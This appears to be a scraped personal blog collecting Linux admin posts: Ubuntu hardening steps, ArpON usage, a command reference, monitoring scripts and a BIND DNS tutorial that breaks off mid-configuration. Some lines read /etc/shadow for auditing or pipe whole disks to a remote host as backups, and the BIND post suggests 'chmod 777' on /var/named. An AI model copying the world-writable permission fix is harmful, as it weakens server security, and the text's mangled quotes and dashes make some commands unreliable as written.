UBUNTU COMMAND

Posted: January 13, 2012 in LINUX, Ubuntu Command ref
Tags: ,
0

##How to view installed packages on ubuntu

 

OR

# dpkg –list

# dpkg –info packageName

# apt-get remove packageName

 

4: Keep Linux Kernel and Software Up to Date

# apt-get update && apt-get upgrade

 

#6.3: Locking User Accounts After Login Failures

To see failed login attempts, enter:

faillog

To unlock an account after login failures, run:

faillog -r -u userName

 

Note you can use passwd command to lock and unlock accounts:

# lock account

passwd -l userName

# unlocak account

passwd -u userName

#6.4: How Do I Verify No Accounts Have Empty Passwords?

 

Type the following command

# awk -F: ‘($2 == “”) {print}’ /etc/shadow

Lock all empty password accounts:

# passwd -l accountName

 

#6.5: Make Sure No Non-Root Accounts Have UID Set To 0

 

Only root account have UID 0 with full permissions to access the system. Type the following command to display all accounts with UID set to 0:

# awk -F: ‘($3 == “0″) {print}’ /etc/passwd

 

Q.How Do I Secure Grub Boot Loader?

#1: Create A Password For Grub

 

Type grub-md5-crypt command to create password in MD5 format:

# grub-md5-cryptOutput:

 

Password:<ENTER-YOUR-PASSWORD>

Retype password:<ENTER-YOUR-PASSWORD>

$1$NYoR71$Sgv6pxQ6LG4GXpfihIJyL0

 

Please note that you need to copy and paste the MD5 password ($1$NYoR71$Sgv6pxQ6LG4GXpfihIJyL0) to your configuration file. Use mouse to copy the same.

#2 Add MD5 Password To Grub Configuration File

 

Under Debian GNU/Linux the Grub configuration file is located at /boot/grub/menu.lst. (Red Hat / Fedora user use /boot/grub/grub.conf file)

# vi /boot/grub/menu.lst

 

Edit file and add a password line as follows:

password –md5 $1$NYoR71$Sgv6pxQ6LG4GXpfihIJyL0

 

To require use of the password for entering single user mode, change the value of the lockalternative variable in the file /boot/grub/menu.lst to true, as shown in the following example.

 

# lockalternative=true

 

 

To disable the reboot action taken by pressing the Ctrl+Alt+Delete key combination, comment out the following line in the file /etc/event.d/control-alt-delete.

 

#exec /sbin/shutdown -r now “Control-Alt-Delete pressed”

 

 

#9.1: Find Listening Network Ports

 

Use the following command to list all open ports and associated programs:

netstat -tulpn

OR

nmap -sT -O localhost

nmap -sT -O server.example.com

 

#15: Disable Unwanted SUID and SGID Binaries

#See all set user id files:

find / -perm +4000

# See all group id files

find / -perm +2000

# Or combine both in a single command

find / \( -perm -4000 -o -perm -2000 \) -print

find / -path -prune -o -type f -perm +6000 -ls

 

#15.1: World-Writable Files

 

Anyone can modify world-writable file resulting into a security issue. Use the following command to find all world writable and sticky bits set files:

find /dir -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print

 

#15.2: Noowner Files

 

Files not owned by any user or group can pose a security problem. Just find them with the following command which do not belong to a valid user and a valid group

find /dir -xdev \( -nouser -o -nogroup \) -print

 

ArpON – Protect yourself from MITM attacks.

ArpON (Arp handler inspectiON) is a portable handler daemon that make ARP secure in order to avoid the Man In The Middle through ARP Spoofing/Poisoning. It detects and blocks also Man In The Middle through ARP Spoofing/Poisoning for DHCP Spoofing, DNS Spoofing, WEB Spoofing, Session Hijacking and SSL/TLS Hijacking & co attacks.

 

This is possible using two kinds of anti ARP Poisoning tecniques: the first is based on SARPI or “Static Arp Inspection” the second on DARPI or “Dynamic Arp Inspection” approach. SARPI and DARPI protects both unidirectional, bidirectional and distributed attacks.

 

Here’s a very quick example of it’s usage, we will use SARPI.

 

arpon -n 10 -g -u 1 -s -i eth0

 

ArpON “Arp handler inspection” version 1.90 (http://arpon.sourceforge.net)

 

[00/02/2011 - 08:32:04 PST] Device: (eth0) MAC: 0:24:21:66:9:5a Inet4: 192.168.1.101 Netmask: 255.255.255.0

 

[00/02/2011 - 08:32:04 PST] Device: (eth0) MAC: 0:24:21:66:9:5a Inet4: 192.168.1.101 Netmask: 255.255.255.0

[00/02/2011 - 08:32:04 PST] SARPI Start…

[00/02/2011 - 08:32:04 PST] SARPI protects these Arp Cache’s entries:

[00/02/2011 - 08:32:04 PST] 1)     192.168.1.1 ->  0:66:78:d6:92:c8

[00/02/2011 - 08:32:04 PST] SARPI Arp Cache refresh timeout: 1 minute.

[00/02/2011 - 08:32:04 PST] SARPI Realtime Protect actived!

 

 

 

-n 10 ~ Sets priority

-g ~ Works in logging mode

-u 1 ~ Sets sarpi timeout to 1 minute

-s ~ Manage arp cache statically

 

You can get ArpON with the apt-get command or visit here

 

 

Multiple network interfaces and ARP flux

 

$sysctl -a | grep net.ipv4.conf.*.arp

A Simple Fix That May Work

 

If all three network interfaces are on different IP networks (such as 10.x.x.x, 172.16.x.x, 192.168.x.x) then executing the following will work:

 

sysctl -w net.ipv4.conf.all.arp_filter=1

 

However, if they are all on the same IP network, which is the case here, then this won’t achieve the desired results.

A More Effective Solution

 

The following can be added to your /etc/sysctl.conf file once you’ve tested it.

 

sysctl -w net.ipv4.conf.all.arp_ignore=1

sysctl -w net.ipv4.conf.all.arp_announce=2

 

 

1/ Clearing ARP cache and table.

You need the “arp -d hostname’ repeatedly to accomplish this.

You could make a script. Is there an easier way ?

 

2/ Clearing the routing table

“route del ROUTEDESCRIPTOR” repeatedly.

 

3/changing the mac of my eth0 card and also changing it back to the original

See “man ethtool”, the -e -E options change the firmware setting. The

“ethtool ethN -s phyad 01:22:33:44:55″ will temporarily change (till reboot or re-command).

 

4/ restarting the network and taking it down.

For a fixed config the RedHat “ifup ethN” and “ifdown ethN” will do. But als osee the

“ip” command and the older deprecated (but very common) “ifconfig” command.

 

5/ assigning static IP’s and masks and then restarting the network to make sure it worked

I’d use “ip”, but “ifconfig” is good too.

ip addr add 192.168.0.77/24 dev eth0

ip link set eth0 up

ip link set eth0 down

or

ifconfig eth0 192.168.0.9../24 up

ifconfig eth0 down

 

6/Firewall stuff

“man iptables” stuff. Search google.com/linux for “iptables howto”.

 

7/ ACL’s

/usr/bin/chacl

/usr/bin/getfacl

/usr/bin/setfacl

/usr/bin/chacl

/usr/bin/getfacl

/usr/bin/setfacl

see “man acl” and “man COMMAND” for the above. Totally POSIX AFAIK.

If you don’t have these then “su -; yum -y install acl”, but I think they are in the default distro.

Reply With Quote

 

“ip neighbor flush all” – clears the arp table(s).

2/ “ip route flush all” – clears the entire route table.

 

The lesson is that the “ip” command subsumes nearly all the arp/route/ifconfig command and should be used instead.

The following output is from executing this command on the HN.

 

$sysctl -a | grep net.ipv4.conf.*.arp

$cat /proc/net/arp

 

$ip route ls

Linux command line reference for common operations.

Posted: January 13, 2012 in LINUX
0

This is a linux command line reference for common operations.
Examples marked with • are valid/safe to paste without modification into a terminal, so
you may want to keep a terminal window open while reading this so you can cut & paste.
All these commands have been tested both on Fedora and Ubuntu.
See also more linux commands.

Command Description
apropos whatis Show commands pertinent to string. See also threadsafe
man -t ascii | ps2pdf – > ascii.pdf make a pdf of a manual page
which command Show full path name of command
time command See how long a command takes
time cat Start stopwatch. Ctrl-d to stop. See also sw
dir navigation
cd - Go to previous directory
cd Go to $HOME directory
(cd dir && command) Go to dir, execute command and return to current dir
pushd . Put current dir on stack so you can popd back to it
file searching
alias l=’ls -l –color=auto’ quick dir listing
ls -lrt List files by date. See also newest and find_mm_yyyy
ls /usr/bin | pr -T9 -W$COLUMNS Print in 9 columns to width of terminal
find -name ‘*.[ch]‘ | xargs grep -E ‘expr’ Search ‘expr’ in this dir and below. See also findrepo
find -type f -print0 | xargs -r0 grep -F ‘example’ Search all regular files for ‘example’ in this dir and below
find -maxdepth 1 -type f | xargs grep -F ‘example’ Search all regular files for ‘example’ in this dir
find -maxdepth 1 -type d | while read dir; do echo $dir; echo cmd2; done Process each item with multiple commands (in while loop)
find -type f ! -perm -444 Find files not readable by all (useful for web site)
find -type d ! -perm -111 Find dirs not accessible by all (useful for web site)
locate -r ‘file[^/]*\.txt’ Search cached index for names. This re is like glob *file*.txt
look reference Quickly search (sorted) dictionary for prefix
grep –color reference /usr/share/dict/words Highlight occurances of regular expression in dictionary
archives and compression
gpg -c file Encrypt file
gpg file.gpg Decrypt file
tar -c dir/ | bzip2 > dir.tar.bz2 Make compressed archive of dir/
bzip2 -dc dir.tar.bz2 | tar -x Extract archive (use gzip instead of bzip2 for tar.gz files)
tar -c dir/ | gzip | gpg -c | ssh user@remote ‘dd of=dir.tar.gz.gpg’ Make encrypted archive of dir/ on remote machine
find dir/ -name ‘*.txt’ | tar -c –files-from=- | bzip2 > dir_txt.tar.bz2 Make archive of subset of dir/ and below
find dir/ -name ‘*.txt’ | xargs cp -a –target-directory=dir_txt/ –parents Make copy of subset of dir/ and below
( tar -c /dir/to/copy ) | ( cd /where/to/ && tar -x -p ) Copy (with permissions) copy/ dir to /where/to/ dir
( cd /dir/to/copy && tar -c . ) | ( cd /where/to/ && tar -x -p ) Copy (with permissions) contents of copy/ dir to /where/to/
( tar -c /dir/to/copy ) | ssh -C user@remote ‘cd /where/to/ && tar -x -p’ Copy (with permissions) copy/ dir to remote:/where/to/ dir
dd bs=1M if=/dev/sda | gzip | ssh user@remote ‘dd of=sda.gz’ Backup harddisk to remote machine
rsync (Network efficient file copier: Use the –dry-run option for testing)
rsync -P rsync://rsync.server.com/path/to/file file Only get diffs. Do multiple times for troublesome downloads
rsync –bwlimit=1000 fromfile tofile Locally copy with rate limit. It’s like nice for I/O
rsync -az -e ssh –delete ~/public_html/ remote.com:’~/public_html’ Mirror web site (using compression and encryption)
rsync -auz -e ssh remote:/dir/ . && rsync -auz -e ssh . remote:/dir/ Synchronize current directory with remote one
ssh (Secure SHell)
ssh $USER@$HOST command Run command on $HOST as $USER (default command=shell)
ssh -f -Y $USER@$HOSTNAME xeyes Run GUI command on $HOSTNAME as $USER
scp -p -r $USER@$HOST: file dir/ Copy with permissions to $USER’s home directory on $HOST
scp -c arcfour $USER@$LANHOST: bigfile Use faster crypto for local LAN. This might saturate GigE
ssh -g -L 8080:localhost:80 root@$HOST Forward connections to $HOSTNAME:8080 out to $HOST:80
ssh -R 1434:imap:143 root@$HOST Forward connections from $HOST:1434 in to imap:143
ssh-copy-id $USER@$HOST Install public key for $USER@$HOST for password-less log in
wget (multi purpose download tool)
(cd dir/ && wget -nd -pHEKk http://www.pixelbeat.org/cmdline.html) Store local browsable version of a page to the current dir
wget -c http://www.example.com/large.file Continue downloading a partially downloaded file
wget -r -nd -np -l1 -A ‘*.jpg’ http://www.example.com/dir/ Download a set of files to the current directory
wget ftp://remote/file[1-9].iso/ FTP supports globbing directly
wget -q -O- http://www.pixelbeat.org/timeline.html | grep ‘a href’ | head Process output directly
echo ‘wget url’ | at 01:00 Download url at 1AM to current dir
wget –limit-rate=20k url Do a low priority download (limit to 20KB/s in this case)
wget -nv –spider –force-html -i bookmarks.html Check links in a file
wget –mirror http://www.example.com/ Efficiently update a local copy of a site (handy from cron)
networking (Note ifconfig, route, mii-tool, nslookup commands are obsolete)
ethtool eth0 Show status of ethernet interface eth0
ethtool –change eth0 autoneg off speed 100 duplex full Manually set ethernet interface speed
iwconfig eth1 Show status of wireless interface eth1
iwconfig eth1 rate 1Mb/s fixed Manually set wireless interface speed
iwlist scan List wireless networks in range
ip link show List network interfaces
ip link set dev eth0 name wan Rename interface eth0 to wan
ip link set dev eth0 up Bring interface eth0 up (or down)
ip addr show List addresses for interfaces
ip addr add 1.2.3.4/24 brd + dev eth0 Add (or del) ip and mask (255.255.255.0)
ip route show List routing table
ip route add default via 1.2.3.254 Set default gateway to 1.2.3.254
host pixelbeat.org Lookup DNS ip address for name or vice versa
hostname -i Lookup local ip address (equivalent to host `hostname`)
whois pixelbeat.org Lookup whois info for hostname or ip address
netstat -tupl List internet services on a system
netstat -tup List active connections to/from system
windows networking (Note samba is the package that provides all this windows specific networking support)
smbtree Find windows machines. See also findsmb
nmblookup -A 1.2.3.4 Find the windows (netbios) name associated with ip address
smbclient -L windows_box List shares on windows machine or samba server
mount -t smbfs -o fmask=666,guest //windows_box/share /mnt/share Mount a windows share
echo ‘message’ | smbclient -M windows_box Send popup to windows machine (off by default in XP sp2)
text manipulation (Note sed uses stdin and stdout. Newer versions support inplace editing with the -i option)
sed ‘s/string1/string2/g’ Replace string1 with string2
sed ‘s/\(.*\)1/\12/g’ Modify anystring1 to anystring2
sed ‘/ *#/d; /^ *$/d’ Remove comments and blank lines
sed ‘:a; /\\$/N; s/\\\n//; ta’ Concatenate lines with trailing \
sed ‘s/[ \t]*$//’ Remove trailing spaces from lines
sed ‘s/\([`"$\]\)/\\\1/g’ Escape shell metacharacters active within double quotes
seq 10 | sed “s/^/      /; s/ *\(.\{7,\}\)/\1/” Right align numbers
sed -n ’1000{p;q}’ Print 1000th line
sed -n ’10,20p;20q Print lines 10 to 20
sed -n ‘s/.*<title>\(.*\)<\/title>.*/\1/ip;T;q Extract title from HTML web page
sed -i 42d ~/.ssh/known_hosts Delete a particular line
sort -t. -k1,1n -k2,2n -k3,3n -k4,4n Sort IPV4 ip addresses
echo ‘Test’ | tr ‘[:lower:]‘ ‘[:upper:]‘ Case conversion
tr -dc ‘[:print:]‘ < /dev/urandom Filter non printable characters
tr -s ‘[:blank:]‘ ‘\t’ </proc/diskstats | cut -f4 cut fields separated by blanks
history | wc -l Count lines
set operations (Note you can export LANG=C for speed. Also these assume no duplicate lines within a file)
sort file1 file2 | uniq Union of unsorted files
sort file1 file2 | uniq -d Intersection of unsorted files
sort file1 file1 file2 | uniq -u Difference of unsorted files
sort file1 file2 | uniq -u Symmetric Difference of unsorted files
join -t” -a1 -a2 file1 file2 Union of sorted files
join -t” file1 file2 Intersection of sorted files
join -t” -v2 file1 file2 Difference of sorted files
join -t” -v1 -v2 file1 file2 Symmetric Difference of sorted files
math
echo ‘(1 + sqrt(5))/2′ | bc -l Quick math (Calculate φ). See also bc
seq -f ’4/%g’ 1 2 99999 | paste -sd-+ | bc -l Calculate π the unix way
echo ‘pad=20; min=64; (100*10^6)/((pad+min)*8)’ | bc More complex (int) e.g. This shows max FastE packet rate
echo ‘pad=20; min=64; print (100E6)/((pad+min)*8)’ | python Python handles scientific notation
echo ‘pad=20; plot [64:1518] (100*10**6)/((pad+x)*8)’ | gnuplot -persist Plot FastE packet rate vs packet size
echo ‘obase=16; ibase=10; 64206′ | bc Base conversion (decimal to hexadecimal)
echo $((0x2dec)) Base conversion (hex to dec) ((shell arithmetic expansion))
units -t ’100m/9.58s‘ ‘miles/hour’ Unit conversion (metric to imperial)
units -t ’500GB’ ‘GiB’ Unit conversion (SI to IEC prefixes)
units -t ’1 googol’ Definition lookup
seq 100 | (tr ‘\n’ +; echo 0) | bc Add a column of numbers. See also add and funcpy
calendar
cal -3 Display a calendar
cal 9 1752 Display a calendar for a particular month year
date -d fri What date is it this friday. See also day
[ $(date -d '12:00 +1 day' +%d) = '01' ] || exit exit a script unless it’s the last day of the month
date –date=’25 Dec’ +%A What day does xmas fall on, this year
date –date=’@2147483647′ Convert seconds since the epoch (1970-01-01 UTC) to date
TZ=’America/Los_Angeles’ date What time is it on west coast of US (use tzselect to find TZ)
date –date=’TZ=”America/Los_Angeles” 09:00 next Fri’ What’s the local time for 9AM next Friday on west coast US
locales
printf “%’d\n” 1234 Print number with thousands grouping appropriate to locale
BLOCK_SIZE=\’1 ls -l Use locale thousands grouping in ls. See also l
echo “I live in `locale territory`” Extract info from locale database
LANG=en_IE.utf8 locale int_prefix Lookup locale info for specific country. See also ccodes
locale -kc $(locale | sed -n ‘s/\(LC_.\{4,\}\)=.*/\1/p’) | less List fields available in locale database
recode (Obsoletes iconv, dos2unix, unix2dos)
recode -l | less Show available conversions (aliases on each line)
recode windows-1252.. file_to_change.txt Windows “ansi” to local charset (auto does CRLF conversion)
recode utf-8/CRLF.. file_to_change.txt Windows utf8 to local charset
recode iso-8859-15..utf8 file_to_change.txt Latin9 (western europe) to utf8
recode ../b64 < file.txt > file.b64 Base64 encode
recode /qp.. < file.qp > file.txt Quoted printable decode
recode ..HTML < file.txt > file.html Text to HTML
recode -lf windows-1252 | grep euro Lookup table of characters
echo -n 0×80 | recode latin-9/x1..dump Show what a code represents in latin-9 charmap
echo -n 0x20AC | recode ucs-2/x2..latin-9/x Show latin-9 encoding
echo -n 0x20AC | recode ucs-2/x2..utf-8/x Show utf-8 encoding
CDs
gzip < /dev/cdrom > cdrom.iso.gz Save copy of data cdrom
mkisofs -V LABEL -r dir | gzip > cdrom.iso.gz Create cdrom image from contents of dir
mount -o loop cdrom.iso /mnt/dir Mount the cdrom image at /mnt/dir (read only)
cdrecord -v dev=/dev/cdrom blank=fast Clear a CDRW
gzip -dc cdrom.iso.gz | cdrecord -v dev=/dev/cdrom - Burn cdrom image (use dev=ATAPI -scanbus to confirm dev)
cdparanoia -B Rip audio tracks from CD to wav files in current dir
cdrecord -v dev=/dev/cdrom -audio -pad *.wav Make audio CD from all wavs in current dir (see also cdrdao)
oggenc –tracknum=’track’ track.cdda.wav -o ‘track.ogg’ Make ogg file from wav file
disk space (See also FSlint)
ls -lSr Show files by size, biggest last
du -s * | sort -k1,1rn | head Show top disk users in current dir. See also dutop
du -hs /home/* | sort -k1,1h Sort paths by easy to interpret disk usage
df -h Show free space on mounted filesystems
df -i Show free inodes on mounted filesystems
fdisk -l Show disks partitions sizes and types (run as root)
rpm -q -a –qf ‘%10{SIZE}\t%{NAME}\n’ | sort -k1,1n List all packages by installed size (Bytes) on rpm distros
dpkg-query -W -f=’${Installed-Size;10}\t${Package}\n’ | sort -k1,1n List all packages by installed size (KBytes) on deb distros
dd bs=1 seek=2TB if=/dev/null of=ext3.test Create a large test file (taking no space). See also truncate
> file truncate data of file or create an empty file
monitoring/debugging
tail -f /var/log/messages Monitor messages in a log file
strace -c ls >/dev/null Summarise/profile system calls made by command
strace -f -e open ls >/dev/null List system calls made by command
strace -f -e trace=write -e write=1,2 ls >/dev/null Monitor what’s written to stdout and stderr
ltrace -f -e getenv ls >/dev/null List library calls made by command
lsof -p $$ List paths that process id has open
lsof ~ List processes that have specified path open
tcpdump not port 22 Show network traffic except ssh. See also tcpdump_not_me
ps -e -o pid,args –forest List processes in a hierarchy
ps -e -o pcpu,cpu,nice,state,cputime,args –sort pcpu | sed ‘/^ 0.0 /d’ List processes by % cpu usage
ps -e -orss=,args= | sort -b -k1,1n | pr -TW$COLUMNS List processes by mem (KB) usage. See also ps_mem.py
ps -C firefox-bin -L -o pid,tid,pcpu,state List all threads for a particular process
ps -p 1,$$ -o etime= List elapsed wall time for particular process IDs
last reboot Show system reboot history
free -m Show amount of (remaining) RAM (-m displays in MB)
watch -n.1 ‘cat /proc/interrupts’ Watch changeable data continuously
udevadm monitor Monitor udev events to help configure rules
system information (see also sysinfo) (‘#’ means root access is required)
uname -a Show kernel version and system architecture
head -n1 /etc/issue Show name and version of distribution
cat /proc/partitions Show all partitions registered on the system
grep MemTotal /proc/meminfo Show RAM total seen by the system
grep “model name” /proc/cpuinfo Show CPU(s) info
lspci -tv Show PCI info
lsusb -tv Show USB info
mount | column -t List mounted filesystems on the system (and align output)
grep -F capacity: /proc/acpi/battery/BAT0/info Show state of cells in laptop battery
# dmidecode -q | less Display SMBIOS/DMI information
# smartctl -A /dev/sda | grep Power_On_Hours How long has this disk (system) been powered on in total
# hdparm -i /dev/sda Show info about disk sda
# hdparm -tT /dev/sda Do a read speed test on disk sda
# badblocks -s /dev/sda Test for unreadable blocks on disk sda
interactive (see also linux keyboard shortcuts)
readline Line editor used by bash, python, bc, gnuplot, …
screen Virtual terminals with detach capability, …
mc Powerful file manager that can browse rpm, tar, ftp, ssh, …
gnuplot Interactive/scriptable graphing
links Web browser
xdg-open . open a file or url with the registered desktop application
© Jan 7 2008

Some usefull command and bash script

Posted: January 13, 2012 in LINUX
Tags: , , ,
0

“FOR AEONS HAVE I HAVE ROAMED ON THE INTERNET”

This script and all other things here are collected from internet. There is no where in my creativeness. All thanks going to be those GURUZ who make it available to us..

This is useful to find out if your server is under attack or not. You can also list abusive IP address using this method.
1).###Daily Command for Admin
# netstat -nat | awk ‘{print $6}’ | sort | uniq -c | sort -n

Dig out more information about a specific ip address:
# netstat -nat |grep {IP-address} | awk ‘{print $6}’ | sort | uniq -c | sort -n

Busy server can give out more information:
# netstat -nat |grep 202.54.1.10 | awk ‘{print $6}’ | sort | uniq -c | sort -n

Get List Of All Unique IP Address

To print list of all unique IP address connected to server, enter:
# netstat -nat | awk ‘{ print $5}’ | cut -d: -f1 | sed -e ‘/^$/d’ | uniq
To print total of all unique IP address, enter:
# netstat -nat | awk ‘{ print $5}’ | cut -d: -f1 | sed -e ‘/^$/d’ | uniq | wc -l

Find Out If Box is Under DoS Attack or Not

If you think your Linux box is under attack, print out a list of open connections on your box and sorts them by according to IP address, enter:
# netstat -atun | awk ‘{print $5}’ | cut -d: -f1 | sed -e ‘/^$/d’ |sort | uniq -c | sort -n

A few more tools:

nmap – scan your server for open ports.
lsof – list open files, network connections and much more.
ntop web based tool – ntop is the best tool to see network usage in a way similar to what top command does for processes i.e. it is network traffic monitoring software. You can see network status, protocol wise distribution of traffic for UDP, TCP, DNS, HTTP and other protocols.
Conky – Another good monitoring tool for the X Window System. It is highly configurable and is able to monitor many system variables including the status of the CPU, memory, swap space, disk storage, temperatures, processes, network interfaces, battery power, system messages, e-mail inboxes etc.
GKrellM – It can be used to monitor the status of CPUs, main memory, hard disks, network interfaces, local and remote mailboxes, and many other things.
vnstat – vnStat is a console-based network traffic monitor. It keeps a log of hourly, daily and monthly network traffic for the selected interface(s).
htop – htop is an enhanced version of top, the interactive process viewer, which can display the list of processes in a tree form.
mtr – mtr combines the functionality of the traceroute and ping programs in a single network diagnostic tool.

 

2) ### Script for Hardware information

 

#!/bin/bash

#
# server_info.sh – display server hardware info
#
# 2008 – Mike Golvach – eggi@comcast.net
#
# Creative Commons Attribution-Noncommercial-Share Alike 3.0 United States License
#

hwinfo=”/usr/sbin/hwinfo –short”
hostname=`hostname`
separator=”—————————————-”
echo $separator
echo “System Information For $hostname”
echo $separator
echo $separator
echo SERVER – MEMORY
echo $separator
/usr/sbin/hwinfo –bios|egrep ‘OEM id:|Product id:|CPUs|Product:|Serial:|Physical Memory Array:|Max. Size:|Memory Device:|Location:|Size:|Speed:|Location:’|sed -e ‘s/”//g’ -e ‘/^ *Speed: */s/Memory Device:/\n Memory Device:/’ -e ‘s/\(Max. Speed:\)/CPU \1 MHz/’ -e ‘s/\(Current Speed\)/CPU \1 MHz/’
echo $separator
echo SMP
echo $separator
$hwinfo –smp
echo $separator
echo CPU
echo $separator
$hwinfo –cpu
echo $separator
echo CD_ROM
echo $separator
/usr/sbin/hwinfo –cdrom|egrep ’24:|Device File:|Driver:’|awk -F”:” ‘{ if ( $1 ~ /[0-9][0-9]*/ ) print $0; else print ” ” $2}’|sed -e ‘s/^.*[0-9] //’ -e ‘s/ //’ -e ‘s/”//g’
echo $separator
echo DISK
echo $separator
$hwinfo –disk
echo $separator
echo PARTITION
echo $separator
$hwinfo –partition
echo $separator
echo NETWORK
echo $separator
$hwinfo –network
echo $separator
echo NETCARD
echo $separator
$hwinfo –netcard
echo $separator

 

3)####Simple Ping monitor on Linux

 

#!/bin/bash
# Simple SHELL script for Linux and UNIX system monitoring with
# ping command
# ————————————————————————-
# Copyright (c) 2006 nixCraft project <http://www.cyberciti.biz/fb/>
# This script is licensed under GNU GPL version 2.0 or above
# ————————————————————————-
# This script is part of nixCraft shell script collection (NSSC)
# Visit http://bash.cyberciti.biz/ for more information.
# ————————————————————————-
# Setup email ID below
# See URL for more info:
# http://www.cyberciti.biz/tips/simple-linux-and-unix-system-monitoring-with-ping-command-and-scripts.html
# ————————————————————————-

# add ip / hostname separated by white space
HOSTS=”cyberciti.biz theos.in router”

# no ping request
COUNT=1

# email report when
SUBJECT=”Ping failed”
EMAILID=”me@mydomain.com”
for myHost in $HOSTS
do
count=$(ping -c $COUNT $myHost | grep ‘received’ | awk -F’,’ ‘{ print $2 }’ | awk ‘{ print $1 }’)
if [ $count -eq 0 ]; then
# 100% failed
echo “Host : $myHost is down (ping failed) at $(date)” | mail -s “$SUBJECT” $EMAILID
fi
done

 

 

4)##BVegginers Script Show Process or every “N” second

 

#!/bin/bash
# Write a shell script to display the process running on the system for every
# 30 seconds, but only for 3 times.
# ————————————————————————-
# Copyright (c) 2008 nixCraft project <http://www.cyberciti.biz/fb/>
# This script is licensed under GNU GPL version 2.0 or above
# ————————————————————————-
# This script is part of nixCraft shell script collection (NSSC)
# Visit http://bash.cyberciti.biz/ for more information.
# ————————————————————————-
#
# for loop 3 times
for r in 1 2 3
do
#see every process on the system
echo “**************************** x^x^x ****************************”
ps -e
echo “**************************** x^x^x ****************************”
#sleep for 30 seconds
sleep 3
# clean
done

 

 

 

Tools ‹ Linux rules the heart of its users. This is enough a reason why one should embrace Linux — WordPress

Posted: December 1, 2010 in LINUX
0

Tools ‹ Linux rules the heart of its users. This is enough a reason why one should embrace Linux — WordPress.

DNS: Linux Bind Installation

Posted: August 4, 2010 in DNS, LINUX
0

What is bind?

BIND is alternative software for translating domain names into IP addresses. Because domain names are alphabetic, they are easier to remember. So if we will browse the Internet we don’t need to remember IP addresses. For example, the domain name www.yourdomain.com might translate to 192.168.0.1.

1. You Can Check BIND Packet

[root@server named]# rpm -qa bind*

bind-libs-9.2.4-2
bind-utils-9.2.4-2
bind-9.2.4-2

2. Setting Computer NS1 With IP 192.168.0.1 As Nameserver And Domain Name yourdomain.com

[root@server ~]# cat /etc/resolv.conf

nameserver 192.168.0.1

2. Setting Computer NS1 With IP 192.168.0.1 As Nameserver And Domain Name yourdomain.com

[root@server ~]# cat /etc/resolv.conf

nameserver 192.168.0.1

3. Setting File /etc/named.conf

[root@server ~]# nano /etc/named.conf

//
// named.conf for Red Hat caching-nameserver
//
options {
   directory "/var/named";
   dump-file "/var/named/data/cache_dump.db";
   statistics-file "/var/named/data/named_stats.txt";
/*
 * If there is a firewall between you and nameservers you want
 * to talk to, you might need to uncomment the query-source
 * directive below.  Previous versions of BIND always asked
 * questions using port 53, but BIND 8.1 uses an unprivileged
 * port by default.
 */
 // query-source address * port 53;
};

//
// a caching only nameserver config
//
controls {
 inet 127.0.0.1 allow { localhost; } keys { rndckey; };
};

zone "localhost" IN {
   type master;
   file "localhost.zone";
   allow-update { none; };
};

zone "yourdomain.com" IN {
   type master;
   file "/var/named/yourdomain.com.zone";
   allow-update { none; };
};

zone "0.168.192.in-addr.arpa" IN {
   type master;
   file "/var/named/0.168.192.rev";
   allow-update { none; };
};

include "/etc/rndc.key";


4. Setting File /var/named/yourdomain.com.zone



First you must create the file yourdomain.com.zone; you can use this syntax:

[root@server ~]# nano /var/named/yourdomain.com.zone

$TTL            86400
@                 IN SOA            yourdomain.com.  root.yourdomain.com. (
100     ; serial
1H      ; refresh
1M      ; retry
1W      ; expiry
1D )    ; minimum
@                   IN NS                 ns1.yourdomain.com.
@                   IN A                 192.168.0.1
ns1                 IN A                 192.168.0.1
@                   IN MX   10           mail.yourdomain.com.
mail                IN A                 192.168.0.1
WWW                 IN A                 192.168.0.1


5. Setting File /var/named/0.168.192.rev



First you must create the file 0.168.192.rev; you can use this syntax:

[root@server ~]# nano /var/named/0.168.192.rev

$TTL    86400
@                 IN SOA          yourdomain.com. root.yourdomain.com. (
100     ; serial
1H      ; refresh
1M      ; retry
1W      ; expiry
1D)     ; minimum

@                 IN NS            ns1.yourdomain.com.
1                 IN PTR           binggo.yourdomain.com

6. nslookup yourdomain.com

[root@server ~]# nslookup yourdomain.com

Server:         192.168.0.1
Address:        192.168.0.1#53

Name:   yourdomain.com
Address: 192.168.0.1

7. dig yourdomain.com

[root@server ~]# dig yourdomain.com

8. Configuration For NS 1 Is Finished

If you see errors, you can try to change the permissions of the folder /var/named.

[root@server ~]# chmod 777 -Rvf /var/named/

mode of `/var/named/’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.zero’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/localhost.zone’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/198.99.208.rev’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/data’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.local’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.ca’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.ip6.local’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/localdomain.zone’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/yourdomain.com.zone’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/named.broadcast’ changed to 0777 (rwxrwxrwx)
mode of `/var/named/slaves’ changed to 0777 (rwxrwxrwx)

9. Check The /var/log/messages Log To Find Out If There Are Errors

[root@server ~]# tail /var/log/messages

————————————————–

Document Source: http://www.howtoforge.com/bind-installation-on-centos

Installation Of BIND As A Secondary (Slave) DNS Server

After we have installed BIND as a master DNS server (NS1) (as explained in my recent post), we can now try to set up a secondary DNS server (NS2) with BIND on CentOS. NS2 acts as a backup if there are problems with NS1.

Make sure you’ve successfully set up NS1, as described in my previous post!

NS1 with IP 192.168.0.1
NS2 with IP 192.168.0.2
Our domain: yourdomain.com

Now we can try setting up NS2.

1.  Check your Bind package

[root@server ~]# rpm -qa bind*

bind-libs-9.2.4-2

bind-utils-9.2.4-2

bind-9.2.4-2

2. Setting file /etc/resolv.conf

[root@server ~]# nano /etc/resolv.conf

nameserver 192.168.0.1

3. Setting file /etc/named.conf

[root@server ~]# nano /etc/named.conf

//
// named.conf for Red Hat caching-nameserver
//

options {
directory "/var/named";
dump-file "/var/named/data/cache_dump.db";
statistics-file "/var/named/data/named_stats.txt";

/*
* If there is a firewall between you and nameservers you want
* to talk to, you might need to uncomment the query-source
* directive below. Previous versions of BIND always asked
* questions using port 53, but BIND 8.1 uses an unprivileged
* port by default.
*/

// query-source address * port 53;
allow-transfer {208.99.198.184/32;};
};

//
// a caching only nameserver config
//

controls {
inet 127.0.0.1 allow { localhost; } keys { rndckey; };
